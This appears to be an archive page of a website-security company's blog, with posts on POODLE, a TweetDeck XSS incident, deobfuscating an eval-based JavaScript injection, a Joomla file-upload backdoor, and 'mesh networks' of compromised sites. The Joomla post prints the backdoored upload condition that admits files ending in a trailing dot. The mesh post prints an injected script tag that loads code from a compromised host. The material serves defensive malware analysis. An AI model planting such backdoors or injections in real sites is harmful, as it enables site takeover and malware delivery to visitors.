Most Common Attacks Affecting Today’s Websites

New web-based attack types and vectors are coming out every day, this is causing businesses, communities and individuals to take security seriously now more than they ever have in the past. This is a huge win for the World Wide Web and it’s a trend that is pushing technology further towards more robust and securely developed web applications.

The recent discovery of another vulnerability in SSL has led thought-leaders and developers to immediately phase out the weak aspect of the protocol. The implementation of SSLv3, and its exploitable nature, gained its marketable canine acronym POODLE for describing the ability to force users to downgrade their encryption to a breakable standard, revealing their sensitive data as if it were being passed in clear text.


Read More

Yoast and Sucuri Partner to Create a Safer Web

We’re very excited to finally talk about a partnership that’s been in the works for a few months and in light of the serious nature of the Security in the WordPress ecosystem it only makes sense. It also comes at a time where we, as an organization, are reinvesting into Website Security space through extensive research which gives us a better grasp of the real threat landscape looks like for website owners.

Benefits of the partnership can be seen and felt by both organizations. Over the past 3 weeks we, Sucuri, have been undergoing big changes in our branding and messaging and many have already started to comment. For Yoast, security audits have begun and updates have been proactively pushed to their users. It is our belief that through this partnership we will be able to make a bigger impact to the online threats website owners face on a daily basis. For those wondering, none of Yoast’s plugins or updates to them that we’ve audited contained any serious vulnerabilities.

This post will talk to the specifics of the partnership and how we will be working together.

Yoast and Sucuri

Regular security audits drive customer trust in Yoast Plugins


Read More

Serious Cross Site Scripting Vulnerability in TweetDeck – Twitter

This morning as I was logging into various social networks I was presented with a popup with “XSS on Tweet Deck.” This obviously set every hair on my neck on fire, it’s obviously not the normal welcome screen.

After some investigation, I found a tweet from one account that I follow that had the following javascript code. It would be all good, but TweetDeck wasn’t sanitizing the input which caused the code to execute on the browser.

Screen Shot 2014-06-11 at 9.41.54 AM

This is why, someone injected this into their tweet. When you logged into TweetDeck it triggered the vulnerability:

Screen Shot 2014-06-11 at 9.45.29 AM

As you can see, the XSS attack was set to automatically retweet via this: data-action:retweet causing a chain event for anyone that logs into TweetDeck.

This is a very serious security flaw. TweetDeck says they have already addressed the issue:

Screen Shot 2014-06-11 at 9.56.21 AM

To be safe though, we recommend logging out of Tweetdeck, Revoking Access in your Twitter profile and resetting all connections if you want to continue to use the application.

Screen Shot 2014-06-11 at 9.56.04 AM

What is very annoying about this is that you can’t undo the automatic retweet, making it very difficult to remove from people’s timeliness. Thankfully, the attack is mostly benign and appears to be intended to making a statement than causing harm, but it’s clear example of how the largest of applications can be exploited.

Analyzing a Malicious iFrame – Following the Eval Trail

Over the last week, we’ve been working with some interesting malware injections. Developers and malware prevention professionals usually think of hidden iframes that deliver spam-seo or other malware as easy to spot. Take this injection, for example (Thanks to Sucuri team member, Rafael C., for the sample):

Sucuri - JS Infection II

This is not a traditional iframe src=’http://… code, but you can see where the bad code lives in the example above. This is a problem for the creators of this malware because if an infection is easily detectable then it’s a relatively straightforward process to write a script to detect and clean it up. That’s why the next step for the malware creator is to hide or obfuscate the injection.

Spotting Obfuscated Code

Using JavaScript, there are several ways to obfuscate malicious code like CharCode or URLEncode. In general, obfuscated malware looks like the example below, but of course, the techniques can be more or less advanced. Our team tends to like writing about the more complicated events:

Sucuri - JS Injection Sample

At first glance, this code looks like a CSS related script, i.e. part of your site’s visual architecture, which you don’t want to touch because it could break your site’s look and feel. This, of course, is exactly what the malware creator wants you to think.

Is it Malware?

The tricky thing here is that this function is actually creating a CSS rule. Were we wrong to think that it’s malicious?

last_style_node.addRule(selector, declaration);

What we need to do to find out is look at the content of the rule. To do that, we look for the function call.

createCSS('#va', 'background:url(data:,String.fromCharCode)');

The code is defining the background image for the #va selector. When you look closely you can see that String.fromCharCode is not a valid URL. Remember, malware creators need to figure out how to hide their code injections. In this scenario, storing the functions it needs inside a CSS style is ingenious.

Now that we know where the malware lives, we can find out how it is recovering those strings:

Sucuri - JS Infection III

Putting It All Together

In the code above, we see that the vkk variable is used as the fromCharCode function and uu variable contains a va string. At this moment, this doesn’t make sense, but it starts to come together as we keep moving through some lines of code.

Sucuri - JS Infection IV

It’s important to the hacker that nothing is stored in plain sight (if it was, it’d be much easier to clean). In this instance, take the t variable as an example; it contains the number 2. In this case, this value is attributed by subtracting 2 from the number of seconds of a date stored in the knr variable. That’s pretty complex, right?

This t variable is used to multiply all entries of the xt array*

*Some of the content of this variable has been removed to shorten the post. It doesn’t affect the code’s logic.

Next, there is an empty function called g, which is attributed to hhhu variable, and within these parameters the uu is being used to create the function. By concatenating the e, va(the content of uu) and l we end up with, eval! Now we’re finding some malware.

Then, another chain of variables, hhhu, is now attributed to ac with a different function–the one inside the variable ry, which, previously, we saw contains String.fromCharCode. Now it’s eval’ing String.fromCharCode for CharCodes that are stored in the xt variable.

Finally, after all this, it calls the eval again–the hhhu–but now to execute the code inside dwms variable, which was decoded using the for loop from before.

Dissecting Malware is A Full Time Job

That was an illustration of one payload. It’s just one data point that articulates the sort of complex obfuscation we deal with on a daily basis and, we can say without reservation, as we continue to find new ways to detect it more easily, malware creators will find ways to make their obfuscation more and more complex. If you’re having trouble with malware or blacklisting, take a look at the symptoms of malware and ask us to help.

Do you have samples you’d like us to analyze? Feel free to engage us on Twitter at SucuriLabs or feel free to send us an email at labs@sucuri.net.

Watch a Layer 7 DDOS Attack – WordPress Security

A few weeks back we reported on very large Layer 7 DDOS attacks within the WordPress ecosystem. Today we decided to provide you a little illustration of what that looks like.

Remember, there is a big difference between Brute Force and Denial of Service attacks, this is specifically for a large DDOS attack involving 40k WordPress sites.

Does Sucuri work with my host? Yes, Yes we do.

We’ve been scanning and removing malware from websites for years, and in this time frame we have seen the website security domain grow by leaps and bounds. Over the same period, the ubiquity of the internet has reached to all corners of the globe, and the number of websites worldwide has skyrocketed (estimated at 955 million and growing). Where do all of those sites live? We decided it would be interesting (and instructive) to look inward to see what the demography of hosts is within our own construct.

Hosting Companies Sucuri Works With

The good news is that it doesn’t matter what host you choose to work through. It’s likely that we already work with whomever you’re likely to choose, though from time to time we do work with hosts that we didn’t even know were in the business. It’s important to note that some hosts, like managed hosts, don’t actually have their own infrastructure. They resell or sit on top of existing hosts. As such, this investigation doesn’t include their number.

This investigation illustrates–in pretty pie-graphical form–that sites on every hosting service get attacked. Regardless of your host platform you should always be thinking about how to protect the investment you’ve made in your website. Here is the host distribution within our environment*:

*The distribution of our clients among the hosts does not mean that any one host gets infected more or less than any other, and is reflective of many different factors.

HostChart_3

Read More

AdSense Blackmail – Hacking Websites for Profit

We deal with different types of malware injections and compromises everyday and the most common question our clients ask us is, “Why me? Why my small little site?”

There are so many answers to this question. In some cases, someone may attack a site for fun, they may do so in the name of “Hacktivism” or it could be someone trying to prove what he/she can do. However, most of the time, it’s done for the same reason most unethical things are done:

Show me the Money!

As in many other walks of life, if there is money to be made unethically by attacking websites, then there will be some people out there willing to make it. Unfortunately there is a LOT of money to be made by taking advantage of websites that don’t have security measures put in place.

People hack sites for money. They make money distributing malware, SEO spam and even phishing. While we still encounter defacements and some other activities that do not give monetary gain to an attacker, money is the most common reason we see for attacks on websites.

To illustrate this point, we recently resolved a case where a customer was being blackmailed regarding a Google AdSense account. AdSense extortion isn’t new (there are several reports from users complaining about it), but this client’s story helps to explain what it could mean for “your small site,” and why it makes sense for an attacker to target many small sites without security measures in place instead of a couple of large ones that may offer a bigger reward per site but be more difficult to attack.

Lets get to our client’s story:

The first contact from the bad guy to our client (all misspellings and grammatical errors sic’d):


Read More

Highly Effective Joomla Backdoor with Small Profile

It feels like every day we’re finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can’t lie, these are truly gems. The things they are doing, and by they I mean the attackers, are in some instance ingenious. I think you’ll agree that this case falls into that category.

In short, this is a highly effective backdoor that carries little profile, making it Hight Speed Low Drag.

Understanding Attackers

As we’ve discussed in the past, most attackers have a pretty standard workflow when compromising websites. Here’s that process in it’s simplest form:

  1. Identify point of entry / weakness
  2. Exploit the entry / weakness
  3. Ensure that they can retain access
  4. Cover your tracks

I agree, nothing earth shattering, but it does help us understand what it is we need to be looking for.

Many will make the argument that a site is not clear if you haven’t performed some level of forensics to understand what happened. Often this same analysis will lend itself to items 3 and 4 in the list. Reverse engineering their attempts to clean up their traces and finding those backdoors, diamonds in the ruff.

Unfortunately, this level of forensics is not for everyone and contrary to popular belief it’s not as simple as looking for simple obfuscation. No, these days the backdoors are becoming highly sophisticated, making use of built-in functions and carry little trace of what you might consider to be traditional backdoors.

What many also don’t realize is how important the third step is. If done correctly, the attacker is able to bypass all your access control mechanisms, i.e., logins like administrator and FTP, and work right off your server with little hesitation.

This post is an example of that, for instance take into consideration these two images:

Image #1

Sucuri-Joomla-Backdoor-I

Image #2

Sucuri-Joomla-Backdoor-II

Can you pinpoint the difference or the backdoor? Is there a backdoor?

Joomla Specific Backdoor

The images above are an example of what we recently found and the purpose of this post.

Yes, I agree, it’s unfair for us to ask you to pinpoint the difference in the images; besides, the total change is no greater than 304 bytes.

But for those keen eyes, you probably noticed the difference in the if-clause, here specifically:

if (!in_array($format, $allowable) && !in_array($format,$ignored))

Versus this:

if ($format == '' || $format == false || (!in_array($format, $allowable) && !in_array($format,$ignored)))

For those that are completely lost, it all comes down to how the $format variable is created. For that we have to look here:

$format = strtolower(JFile::getExt($file['name']));

This tell us that the variable is getting the file’s extension using a Joomla native function called getExt. This function does this:

function getExt($file) {
$chunks = explode('.', $file);
$chunksCount = count($chunks) - 1;

if($chunksCount > 0) {
return $chunks[$chunksCount];
}

return false;
}

This in turn breaks the file name into pieces based on the positions of the dot, returning false if there are not dots. If everything is ok it returns the latest group after the last dot, i.e., the extension.

This is where the canUpload function will check if the extension is part of the allowed ones or not. This goes back to the very first if clause shared above.

In the second set, you see two additional conditions, if $format is false or if it’s empty. That’s then followed by another .OR. operator just before checking if the extension is allowed.

In these cases, if the extension is empty or if it’s false or allowed, the file can be uploaded. This and nothing is the same thing, right?

Wow, that one hurt my head too, sorry.. but hang in there.

In order to make the $format false, or empty, the attacker would need to add a trailing dot to the end of the file, like backdoor.php.. But it’s not that simple, the upload alone won’t make it useable.

That brings you to the next obvious question, “Fio, if it’s not usable why the heck did you take us down riddle man?” Glad you asked…

First, because I probably had one too many beers while writing this.

Second, it comes down to this code:

function makeSafe($file) {
// Remove any trailing dots, as those aren't ever valid file names.
$file = rtrim($file, '.');
$regex = array('#(\.){2,}#', '#[^A-Za-z0-9\.\_\- ]#', '#^\.#');
return preg_replace($regex, '', $file);
}

I mean seriously, have you ever seen code in better shape than this? The lines, the logic, even the commenting..

// Remove any trailing dots, as those aren’t ever valid file names.

And you have to appreciate the irony in the function name, makeSafe. Make safe a backdoor that is going to do anything but make your website safe.

Here is the kicker, for those that didn’t catch it, this is a valid function inside ./libraries/joomla/filesystem/file.php, a core file of Joomla. This function, by design, cleans out all odd characters from a filename and returns a safe filename. Sound familiar? Remember that trailing dot? Pretty sure that’s unsafe, Joomla core agrees with us, as such it does what it’s supposed to do, makes a previously unsafe file, safe. Ain’t that something?

Perfect example of a feature that gets abused for bad when it was designed for good.

The Ever Evolving Landscape

I chose to share this little gem with the world because it talks volumes to the evolution in the attacks that we’re seeing. The website security market has turned into a gold rush as of late, but with that growth we have seen new innovation in the way attackers are 1) attacking websites and 2) how they’re retaining control of those same websites.

This is forcing us to really look deep into the various detection and remediation technologies to better understand how to prevent scenarios like the one described in this post.

This attack specifically is not something a signature would have ever picked up, it’s tightly integrated and dependent on what most would categorize as “good” code, and by good I mean it’s part of core and designed to do a good thing. Now extend this line of thinking, think beyond core.

If attackers are starting to look at how “good” code functions and finding ways to manipulate its use, what is to stop them from extending that thought process to code found in your templates, themes, extensions, plugins? This is a real problem that extends far beyond Joomla and will soon plague other CMS applications, if they are not already.

If you have something to add or share on the post, use the comments we’d love to get your hear from you.

If you find yourself in a similar situation, suffering repeated attacks or infections be sure to contact us. Whether you’re infected and need to be cleared, or prefer not to have to deal with this at all, we have a complete security solution to keep your website clean and safe.

Many Pieces of a Puzzle: Target, Neiman Marcus and Website Hacking

Corporations get hacked all the time. This is not news to anyone in the security business, but it has certainly received a lot of attention from those in the media over the last few weeks because of a couple of large-scale credit card events at both Target and Neiman Marcus.

Website Malware

Read More

Website Mesh Networks Distributing Malware

Can you imagine having the keys to a kingdom? How awesome would that be!! This is true in all domains, especialy when it comes to your website. This is almost like the holy grail of website attacks, gain access and do what you want with someone else’s pride and joy.

We all know that once a website is compromised it can be used by attackers in various ways. The most common attack we see leverages the hacked site as part of a malicious SEO Spam campaign (most profitable), followed by malware distribution (think drive by downloads) and ofcourse the integration into botnets, to perform things like DDOS / brute force attacks on other sites.

In any of these scenarios the attacker is able to, more often than not, monetize “their” new website. Yes, the fact that they have gained access to your website makes it theirs now. On a side note, we are seeing a tremendous number of websites being used to mine bitcoins specifically, but being it’s the new Billion dollar currency it only makes sense, but I digress.

Back to the point…

None of this, ofcourse, is new to our industry. Just crawl through the archives of this blog and you’ll find scores of data points that talk to the various scenarios addressed above. What you won’t find though is this new trend that we’re seeing.

Since the shutdown of the Blackhole Exploit kit we’ve been sitting back idly waiting for the next big thing, and perhaps this is it, but then again, perhaps it’s nothing more something that hid in the shadow and is only now finally out in plain sight.

Let’s talk a little about website mesh networks and how they are being used to distribute malware.

What is a Mesh Network?

We won’t get into the details of what a Mesh Network is but we’ll provide you a little context so that you can better understand it as you read through this post:

A mesh network is a network topology in which each node (called a mesh node) relays data for the network. All nodes cooperate in the distribution of data in the network. – Wikipedia

Yes, I know, not the fanciest of descriptions but for our purpose it works. When reading through this, I want you think of each website as a node in the mesh.

Sucuri Mesh Network Illustration

In essence, each of the websites, although hosted separately, owned by people that don’t know each other, are all, inevitably interconnected to one another. Again, nothing new in the concept, we see it everyday in various botnets, right?

Mesh Network of Compromised Webites

The latest exploit kit payloads we are tracking on compromised websites seem to have a very similar characteristic, they are part of a bigger network of compromised website, or what we’re classifying as a compromised Website Mesh Network. As websites get infected, the attackers are continuously adding them to their larger network of malware intermediaries. This means it is not only being used against people visiting the website, but also against users of other compromised sites.

Think of a mesh network of script injections…

How a Mesh Network of JavaScript Injections Works

Let’s say the bad guy, Home Simpson managed to hack into 3 web sites: X.com, Y.com and Z.com. Homer injects malware into X.com that then loads from Y.com. The malware from Y.com is loaded from Z.com and the one from Z.com is loaded from X.com.

That’s right folks, you guessed it, it’s one Giant Self-Licking Ice Cream Cone!!!

Here is a better illustration of the flow:

x.com -> injected with code loading from y.com/hNtpSAXt.php?id=56162149
y.com -> injected with code loading from z.com/8zCUWiW7.php?id=55158211
z.com -> injected with code loading from x.com/zsaok9XZ.php?id=45566441

The Benefit of such a Network

The attacker no longer needs to register domains to hide malicious content and it is very hard to take down. The more sites he manages to compromise, the more powerful their mesh network of compromised websites becomes.

Mesh Network of the Javascript Injection RANDOM.php?id=RANDOM

To put this into perspective, just on the JavaScript injection they can look something like this:

<script src="httx://tiande-rivne-com-ua.1gb. ua/hNtpSAXt.php ?id=56162149&quit;
type="text/javascript"></script>

With this simple payload we were able to identify some 800 websites and more than 19,000 pages compromised. And the injection always happen with the same format, a script src loading from a random PHP file and a random ID code. Every compromised site gets this PHP code injected in it.

These are just some of the injections we were able to capture:

What is the Scale of these Website Mesh Networks?

While it is really hard to provide definitives around how many websites are really compromised and injected with this type of infection we are able to provide some good educated guesses.

Using our very limited view, we identified 800+ domains within our own network of clients. Google agrees with us and it seems they identified a lot more sites, who would have thought, based on the safe browsing data.

If you look at http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=fixreputation.net, they say:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 101 domain(s), including dimensiones.org/, rometransfer.com/, hout-atelier.nl/.

If you check http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=magazyntuiteraz.pl, you will see:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 60 domain(s), including moyer-consulting.com/, rote-liebe96.de/, izorynek.pl/.

So it seems that each site compromised is also used to infected 50+ different domains. And the more you dive into the data, the more sites you find.

For instance, look at this one http://www.google.com/safebrowsing/diagnostic?site=tiande-rivne-com-ua.1gb.ua you will see:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 662 domain(s), including ovptrade.com/, stalkerzoneworld.ru/, fondazionegiannipellicani.it/

You can see that with a little sleuthing the order of magnitude begins to quickly multiply.

How are the sites being compromised

Ah yes, the age old question of how!!!

It’s not any easier to answer here as it’s ever been in any other post we share. As is often the case we see ascertain our data remotely and as such we are limited in a number ways, this case was no exception. We will however provide a post later better dissecting the payload, or at least we hope we will.

As for the how, we did try to scan several of the compromised website in attempt to identify the vector, but we had little luck. While we were unable to find a much coveted silver bullet that tied them together, there was more in what we didn’t find than one might think.

For instance, a few of them were using Drupal, others were using WordPress and ofcourse our Joomla friends were in on the action too. While this does not tell us the access vector, it does tell us it’s platform agnostic.

From this we can make a very educated assumption that the attackers are more than likely using a suite of tools to exploit these websites. From Brute Force attacks against the various platform admin panels to gain access control, to exploiting known or new vulnerabilities in any of the various applications. What is curious though is whether it’s all in one tool or kit and whether the payloads are being created independent of the platforms. Often, what we see is a payload specific to a platform which is later adapted or enhanced for other platforms. To find something like these attacks so tightly integrated and intertwined talks to an interesting trend.

Are you a webmaster? Do you own a web site? Please do your part securing your site so it is not added to these compromised Website Mesh Networks. There are various tools you can use to scan your websites and clean them up if they are infected, leverage them. Don’t get caught with your pants down!